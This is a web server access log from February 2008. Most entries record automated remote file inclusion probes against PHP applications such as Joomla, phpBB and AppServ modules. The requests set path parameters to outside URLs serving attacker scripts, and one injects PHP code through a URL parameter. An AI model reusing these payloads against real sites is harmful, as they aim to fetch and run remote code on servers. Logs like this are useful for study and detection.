67.60.162.149 - - [08/Feb/2008:04:59:42 -0800] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:04:59:53 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.143.196 - - [08/Feb/2008:05:00:15 -0800] "GET /index.php?option=com_webring&Itemid=&mosConfig_absolute_path=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.55.143.196 - - [08/Feb/2008:05:00:15 -0800] "GET /logs/index.php?option=com_webring&Itemid=&mosConfig_absolute_path=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
64.22.85.186 - - [08/Feb/2008:05:01:37 -0800] "GET /logs/access_071225.log///////////modules/4nAlbum/public/displayCategory.php?basepath=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.85.186 - - [08/Feb/2008:05:01:37 -0800] "GET /logs///////////modules/4nAlbum/public/displayCategory.php?basepath=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.9 - - [08/Feb/2008:05:01:47 -0800] "GET /logs/access_071225.log///////////modules/4nAlbum/public/displayCategory.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.25.34 - - [08/Feb/2008:05:02:41 -0800] "GET /logs/access.log/errors.php?error=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.25.34 - - [08/Feb/2008:05:02:42 -0800] "GET /errors.php?error=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.25.34 - - [08/Feb/2008:05:02:42 -0800] "GET /logs/errors.php?error=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.126.126.214 - - [08/Feb/2008:05:03:02 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=8/index.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.workinghome2004.com//chat/inc/flashChat.php/31337.jpg? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
116.123.61.170 - - [08/Feb/2008:05:03:42 -0800] "GET /logs/access_071229.loghttp://zaperyan1918moon.chat.ru/html/aboutme? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.58.184.170 - - [08/Feb/2008:05:06:09 -0800] "GET /logs/access_080122.log/index.php?sourcedir=http://netbr.org/documents/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.170 - - [08/Feb/2008:05:06:09 -0800] "GET /logs/index.php?sourcedir=http://netbr.org/documents/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.239.227.171 - - [08/Feb/2008:05:06:12 -0800] "GET /lib/header.php?DOC_ROOT=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
90.132.213.214 - - [08/Feb/2008:05:06:29 -0800] "GET /logs/access.log/errors.php?error=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
90.132.213.214 - - [08/Feb/2008:05:06:30 -0800] "GET /errors.php?error=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
90.132.213.214 - - [08/Feb/2008:05:06:30 -0800] "GET /logs/errors.php?error=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [08/Feb/2008:05:06:46 -0800] "GET /logs/access_080105.log/index.php?configFile=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [08/Feb/2008:05:06:47 -0800] "GET /index.php?configFile=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [08/Feb/2008:05:06:47 -0800] "GET /logs/index.php?configFile=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.48.110.18 - - [08/Feb/2008:05:07:51 -0800] "GET /config.inc.php?path_escape=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:05:07:52 -0800] "GET /logs/Decoder.php?base_dir=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:05:07:53 -0800] "GET /Decoder.php?base_dir=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:05:08:17 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:05:08:17 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:08:21 -0800] "GET /logs/access_071229.log/phpATM/config.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:08:21 -0800] "GET /logs/access_071229.log/phpATM/config.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:08:21 -0800] "GET /phpATM/config.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:08:21 -0800] "GET /phpATM/config.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:08:22 -0800] "GET /logs/phpATM/config.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:08:22 -0800] "GET /logs/phpATM/config.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:05:08:22 -0800] "GET /modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:05:08:24 -0800] "GET /logs/modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:05:08:34 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:05:08:34 -0800] "GET ///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:05:08:34 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:05:08:59 -0800] "GET /logs/access.log///////////?mosConfig_absolute_path=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:05:09:00 -0800] "GET ///////////?mosConfig_absolute_path=http://anjink.co.cc/load.txt?? HTTP/1.1" 200 2971 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:05:09:00 -0800] "GET /logs///////////?mosConfig_absolute_path=http://anjink.co.cc/load.txt?? HTTP/1.1" 200 33699 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:05:09:05 -0800] "GET /logs/access_080122.log///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:05:09:13 -0800] "GET /logs/access_071230.log///////////?mosConfig_absolute_path=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.25.34 - - [08/Feb/2008:05:10:43 -0800] "GET /logs/access_080121.log/errors.php?error=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
90.132.213.214 - - [08/Feb/2008:05:12:20 -0800] "GET /logs/access_080121.log/errors.php?error=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [08/Feb/2008:05:13:59 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:15:26 -0800] "GET /logs/access_080117.log/phpATM/config.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:15:26 -0800] "GET /logs/access_080117.log/phpATM/config.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.208.96.102 - - [08/Feb/2008:05:15:44 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://rafb.net/p/fZZpha10.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
74.208.96.102 - - [08/Feb/2008:05:15:44 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://rafb.net/p/fZZpha10.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
59.106.19.18 - - [08/Feb/2008:05:16:12 -0800] "GET /logs/access_080104.log//common/db.php?commonpath=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [08/Feb/2008:05:16:13 -0800] "GET //common/db.php?commonpath=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [08/Feb/2008:05:16:13 -0800] "GET /logs//common/db.php?commonpath=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.143 - - [08/Feb/2008:05:16:20 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.247.71.13 - - [08/Feb/2008:05:17:09 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.88.90 - - [08/Feb/2008:05:18:37 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://turnkeywebsites247.com/catimages/z? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.89.250.64 - - [08/Feb/2008:05:19:43 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.96.102 - - [08/Feb/2008:05:19:43 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://classifiedsphilippines.com/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.89.250.64 - - [08/Feb/2008:05:19:48 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:05:21:04 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:05:21:04 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
222.239.227.171 - - [08/Feb/2008:05:21:11 -0800] "GET /lib/functions.php?DOC_ROOT=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.108.81.11 - - [08/Feb/2008:05:21:58 -0800] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.123.86.130 - - [08/Feb/2008:05:22:04 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.123.86.130 - - [08/Feb/2008:05:22:04 -0800] "GET ///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.123.86.130 - - [08/Feb/2008:05:22:04 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:05:22:11 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:05:22:12 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.43.13.99 - - [08/Feb/2008:05:22:17 -0800] "GET /logs/access_080104.log//common/db.php?commonpath=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.13.99 - - [08/Feb/2008:05:22:18 -0800] "GET //common/db.php?commonpath=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.13.99 - - [08/Feb/2008:05:22:18 -0800] "GET /logs//common/db.php?commonpath=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.123.86.130 - - [08/Feb/2008:05:22:25 -0800] "GET /logs/access_080122.log///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:05:22:33 -0800] "GET /logs/Decoder.php?base_dir=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
222.239.227.171 - - [08/Feb/2008:05:22:34 -0800] "GET /logs/lib/header.php?DOC_ROOT=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.20.28 - - [08/Feb/2008:05:22:36 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [08/Feb/2008:05:22:36 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [08/Feb/2008:05:22:37 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:05:22:53 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:05:22:53 -0800] "GET ///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:05:22:53 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.10 - - [08/Feb/2008:05:23:14 -0800] "GET /logs//index.php?theme=http://rafb.net/p/fZZpha10.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
217.13.86.10 - - [08/Feb/2008:05:23:16 -0800] "GET //index.php?theme=http://rafb.net/p/fZZpha10.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:05:23:16 -0800] "GET /logs/access_080122.log///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.239.227.171 - - [08/Feb/2008:05:23:48 -0800] "GET /logs/access_071229.log/lib/header.php?DOC_ROOT=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:05:24:01 -0800] "GET /Decoder.php?base_dir=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
76.74.186.159 - - [08/Feb/2008:05:26:20 -0800] "GET /logs/access_080122.log//appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.186.159 - - [08/Feb/2008:05:26:20 -0800] "GET //appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.186.159 - - [08/Feb/2008:05:26:20 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.186.159 - - [08/Feb/2008:05:26:22 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.20.28 - - [08/Feb/2008:05:26:34 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.134.95 - - [08/Feb/2008:05:26:49 -0800] "GET /logs/modules/My_eGallery/errors.php?error=http://www.trinker-ulm.de//phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.160.134.95 - - [08/Feb/2008:05:26:50 -0800] "GET /modules/My_eGallery/errors.php?error=http://www.trinker-ulm.de//phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:05:27:23 -0800] "GET /logs/index.php?u=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:05:27:23 -0800] "GET /index.php?u=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
89.108.66.182 - - [08/Feb/2008:05:27:48 -0800] "GET /index.php?option=com_directory&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:29:40 -0800] "GET /logs/access_071229.log/phpATM/login.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:29:40 -0800] "GET /logs/access_071229.log/phpATM/login.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:29:40 -0800] "GET /phpATM/login.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:29:40 -0800] "GET /phpATM/login.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:29:41 -0800] "GET /logs/phpATM/login.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:29:57 -0800] "GET /logs/phpATM/login.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:05:30:11 -0800] "GET /logs/myevent.php?myevent_path=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:05:30:11 -0800] "GET /myevent.php?myevent_path=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
76.74.186.159 - - [08/Feb/2008:05:30:14 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.186.159 - - [08/Feb/2008:05:30:16 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.186.159 - - [08/Feb/2008:05:30:16 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.190.195.104 - - [08/Feb/2008:05:30:20 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.190.195.104 - - [08/Feb/2008:05:30:20 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
123.242.224.57 - - [08/Feb/2008:05:30:59 -0800] "GET /logs/access_071219.log/linkpoint.inc.php?config[root_dir]=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.242.224.57 - - [08/Feb/2008:05:30:59 -0800] "GET /linkpoint.inc.php?config[root_dir]=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.242.224.57 - - [08/Feb/2008:05:30:59 -0800] "GET /logs/linkpoint.inc.php?config[root_dir]=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:31:08 -0800] "GET /logs/access_080117.log/phpATM/login.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [08/Feb/2008:05:31:13 -0800] "GET /logs/access_080117.log/phpATM/login.php?include_location=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.89.250.64 - - [08/Feb/2008:05:31:42 -0800] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
123.242.224.57 - - [08/Feb/2008:05:32:05 -0800] "GET /logs/access_080101.log/linkpoint.inc.php?config[root_dir]=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.95.15 - - [08/Feb/2008:05:32:49 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://sbn.poilpark.net/docu/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.95.15 - - [08/Feb/2008:05:32:49 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.242.224.57 - - [08/Feb/2008:05:33:23 -0800] "GET /logs/access_071219.log/linkpoint.inc.php?config[root_dir]=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.242.224.57 - - [08/Feb/2008:05:33:26 -0800] "GET /linkpoint.inc.php?config[root_dir]=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.242.224.57 - - [08/Feb/2008:05:33:27 -0800] "GET /logs/linkpoint.inc.php?config[root_dir]=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.133.191.100 - - [08/Feb/2008:05:33:54 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fwfccucc.org/n? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
